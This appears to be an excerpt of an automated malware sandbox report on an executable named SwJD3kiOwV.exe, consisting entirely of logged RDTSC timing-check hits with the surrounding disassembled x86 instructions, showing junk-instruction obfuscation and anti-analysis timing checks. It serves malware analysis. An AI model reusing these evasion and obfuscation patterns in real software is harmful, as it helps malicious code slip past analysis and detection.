Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 1349EBC second address: 1349EC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 1349EC0 second address: 1349ED0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F4970E062C6h 0x0000000a jno 00007F4970E062C6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 1349ED0 second address: 1349ED4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 134A1F6 second address: 134A200 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F4970E062C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 134E59B second address: 134E5BA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4970D67E8Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F4970D67E91h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 134E5BA second address: 134E5C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F4970E062C6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 1384FB6 second address: 1384FBC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 1384FBC second address: 1384FC7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jnl 00007F4970E062C6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 1384FC7 second address: 1384FDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push esi 0x00000008 push ebx 0x00000009 jno 00007F4970D67E86h 0x0000000f pop ebx 0x00000010 push esi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 138928F second address: 1389298 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 1389298 second address: 13892D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F4970D67E98h 0x0000000e jmp 00007F4970D67E99h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 13892D2 second address: 13892D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 139AA95 second address: 139AA99 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 139AA99 second address: 139AAA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 139AAA5 second address: 139AAAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 139D4FA second address: 139D507 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007F4970E062C6h 0x00000009 push eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 1461CC6 second address: 1461CCA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 1461E1B second address: 1461E21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 1461E21 second address: 1461E25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 1461E25 second address: 1461E39 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F4970E062C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jno 00007F4970E062C6h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 1461E39 second address: 1461E3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 1461E3D second address: 1461E43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 1461E43 second address: 1461E48 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 146241B second address: 1462446 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F4970E062D7h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jnc 00007F4970E062C6h 0x00000013 jg 00007F4970E062C6h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 1462446 second address: 146244C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 146244C second address: 146246A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4970E062D8h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 1462605 second address: 146260F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 146260F second address: 1462613 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 1462773 second address: 146277D instructions: 0x00000000 rdtsc 0x00000002 js 00007F4970D67E86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 14659EA second address: 1465A09 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F4970E062D3h 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 1465A09 second address: 1465A0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 1465A0D second address: 1465A17 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F4970E062C6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 14682DB second address: 14682E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 14688C7 second address: 14688DA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4970E062CFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 14688DA second address: 1468928 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4970D67E8Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push esi 0x0000000f call 00007F4970D67E88h 0x00000014 pop esi 0x00000015 mov dword ptr [esp+04h], esi 0x00000019 add dword ptr [esp+04h], 00000014h 0x00000021 inc esi 0x00000022 push esi 0x00000023 ret 0x00000024 pop esi 0x00000025 ret 0x00000026 mov dl, EAh 0x00000028 push dword ptr [ebp+122D1E54h] 0x0000002e movzx edx, dx 0x00000031 sbb dl, 0000007Dh 0x00000034 push F6C6F30Ch 0x00000039 pushad 0x0000003a push edi 0x0000003b jc 00007F4970D67E86h 0x00000041 pop edi 0x00000042 pushad 0x00000043 push eax 0x00000044 push edx 0x00000045 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 146A3D0 second address: 146A3DA instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F4970E062CCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 1469EDD second address: 1469F01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4970D67E96h 0x00000009 jnl 00007F4970D67E86h 0x0000000f popad 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 1469F01 second address: 1469F1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F4970E062CFh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 1469F1B second address: 1469F1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 1469F1F second address: 1469F3B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4970E062D0h 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 1469F3B second address: 1469F45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F4970D67E86h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 7780022 second address: 7780040 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ch, 68h 0x00000005 movsx ebx, si 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push ecx 0x00000010 pop ebx 0x00000011 jmp 00007F4970E062CCh 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 7780040 second address: 7780090 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F4970D67E91h 0x00000009 sbb cx, BB26h 0x0000000e jmp 00007F4970D67E91h 0x00000013 popfd 0x00000014 call 00007F4970D67E90h 0x00000019 pop eax 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d xchg eax, ebp 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 jmp 00007F4970D67E8Ah 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 7780090 second address: 7780095 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 7780095 second address: 7780116 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4970D67E91h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c push ecx 0x0000000d pushfd 0x0000000e jmp 00007F4970D67E93h 0x00000013 jmp 00007F4970D67E93h 0x00000018 popfd 0x00000019 pop esi 0x0000001a call 00007F4970D67E99h 0x0000001f mov eax, 41BC0AE7h 0x00000024 pop eax 0x00000025 popad 0x00000026 mov eax, dword ptr fs:[00000030h] 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 jmp 00007F4970D67E95h 0x00000035 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 7780116 second address: 778011C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 778011C second address: 7780134 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx ecx, dx 0x00000006 push ebx 0x00000007 pop esi 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b sub esp, 18h 0x0000000e pushad 0x0000000f mov edi, 78EA3242h 0x00000014 push eax 0x00000015 push edx 0x00000016 mov eax, edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 7780134 second address: 778015C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push esp 0x00000008 pushad 0x00000009 mov cx, D643h 0x0000000d mov cx, 939Fh 0x00000011 popad 0x00000012 mov dword ptr [esp], ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F4970E062D1h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 778015C second address: 778016C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4970D67E8Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 778016C second address: 77801A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebx, dword ptr [eax+10h] 0x0000000b jmp 00007F4970E062D7h 0x00000010 xchg eax, esi 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F4970E062D5h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 77801A6 second address: 778021B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F4970D67E97h 0x00000009 or ah, 0000000Eh 0x0000000c jmp 00007F4970D67E99h 0x00000011 popfd 0x00000012 pushfd 0x00000013 jmp 00007F4970D67E90h 0x00000018 adc eax, 0DCB3488h 0x0000001e jmp 00007F4970D67E8Bh 0x00000023 popfd 0x00000024 popad 0x00000025 pop edx 0x00000026 pop eax 0x00000027 push eax 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007F4970D67E94h 0x0000002f rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 778021B second address: 7780252 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F4970E062D7h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, esi 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F4970E062D5h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 7780252 second address: 77802B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4970D67E91h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, dword ptr [772406ECh] 0x0000000f jmp 00007F4970D67E8Eh 0x00000014 test esi, esi 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007F4970D67E8Dh 0x0000001f and ch, FFFFFFC6h 0x00000022 jmp 00007F4970D67E91h 0x00000027 popfd 0x00000028 jmp 00007F4970D67E90h 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 77802B4 second address: 77802BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 77802BA second address: 77802BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 77802BE second address: 7780302 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007F4970E071B7h 0x0000000e jmp 00007F4970E062D9h 0x00000013 xchg eax, edi 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F4970E062D8h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 7780302 second address: 7780311 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4970D67E8Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 7780311 second address: 778033D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4970E062D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F4970E062CCh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 778033D second address: 778034F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4970D67E8Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 778034F second address: 7780375 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4970E062CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, edi 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F4970E062D0h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 7780375 second address: 778037B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 778037B second address: 7780381 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 7780381 second address: 7780385 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 7780385 second address: 7780389 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 7780389 second address: 77803A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 call dword ptr [77210B60h] 0x0000000e mov eax, 766BE5E0h 0x00000013 ret 0x00000014 pushad 0x00000015 movzx ecx, bx 0x00000018 push eax 0x00000019 push edx 0x0000001a mov di, 4D90h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 77803A1 second address: 77803D0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4970E062D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push 00000044h 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F4970E062CDh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 77803D0 second address: 77803F5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4970D67E91h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F4970D67E8Dh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 77803F5 second address: 77803FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 77803FB second address: 77803FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 77803FF second address: 77804C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 pushad 0x0000000a mov ch, AEh 0x0000000c mov edx, 3C650E62h 0x00000011 popad 0x00000012 mov dword ptr [esp], edi 0x00000015 jmp 00007F4970E062D9h 0x0000001a push dword ptr [eax] 0x0000001c pushad 0x0000001d push ecx 0x0000001e mov eax, edi 0x00000020 pop ebx 0x00000021 call 00007F4970E062D4h 0x00000026 movzx esi, dx 0x00000029 pop edx 0x0000002a popad 0x0000002b mov eax, dword ptr fs:[00000030h] 0x00000031 pushad 0x00000032 pushfd 0x00000033 jmp 00007F4970E062D8h 0x00000038 and eax, 3F46F5B8h 0x0000003e jmp 00007F4970E062CBh 0x00000043 popfd 0x00000044 pushad 0x00000045 pushfd 0x00000046 jmp 00007F4970E062D6h 0x0000004b or ax, B018h 0x00000050 jmp 00007F4970E062CBh 0x00000055 popfd 0x00000056 push eax 0x00000057 pop edi 0x00000058 popad 0x00000059 popad 0x0000005a push dword ptr [eax+18h] 0x0000005d push eax 0x0000005e push edx 0x0000005f jmp 00007F4970E062D1h 0x00000064 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 7780633 second address: 7780637 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 7780637 second address: 778063D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 778063D second address: 7780642 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 7780642 second address: 778075B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4970E062CEh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esi+14h], eax 0x0000000f jmp 00007F4970E062D0h 0x00000014 mov eax, dword ptr [ebx+54h] 0x00000017 jmp 00007F4970E062D0h 0x0000001c mov dword ptr [esi+18h], eax 0x0000001f jmp 00007F4970E062D0h 0x00000024 mov eax, dword ptr [ebx+58h] 0x00000027 jmp 00007F4970E062D0h 0x0000002c mov dword ptr [esi+1Ch], eax 0x0000002f pushad 0x00000030 call 00007F4970E062CEh 0x00000035 pushfd 0x00000036 jmp 00007F4970E062D2h 0x0000003b sbb si, 8088h 0x00000040 jmp 00007F4970E062CBh 0x00000045 popfd 0x00000046 pop esi 0x00000047 jmp 00007F4970E062D9h 0x0000004c popad 0x0000004d mov eax, dword ptr [ebx+5Ch] 0x00000050 jmp 00007F4970E062CEh 0x00000055 mov dword ptr [esi+20h], eax 0x00000058 pushad 0x00000059 pushfd 0x0000005a jmp 00007F4970E062CEh 0x0000005f xor ah, 00000048h 0x00000062 jmp 00007F4970E062CBh 0x00000067 popfd 0x00000068 pushfd 0x00000069 jmp 00007F4970E062D8h 0x0000006e sub eax, 2559B7A8h 0x00000074 jmp 00007F4970E062CBh 0x00000079 popfd 0x0000007a popad 0x0000007b mov eax, dword ptr [ebx+60h] 0x0000007e push eax 0x0000007f push edx 0x00000080 pushad 0x00000081 push eax 0x00000082 push edx 0x00000083 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 778075B second address: 7780760 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 7780760 second address: 7780766 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 7780766 second address: 778076A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 778076A second address: 778078D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4970E062CFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esi+24h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 mov ebx, 2DAE5CE4h 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 778078D second address: 77807A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4970D67E8Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+64h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 77807A4 second address: 77807C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4970E062D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 77807C1 second address: 77807D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4970D67E8Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 77807D1 second address: 77807D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
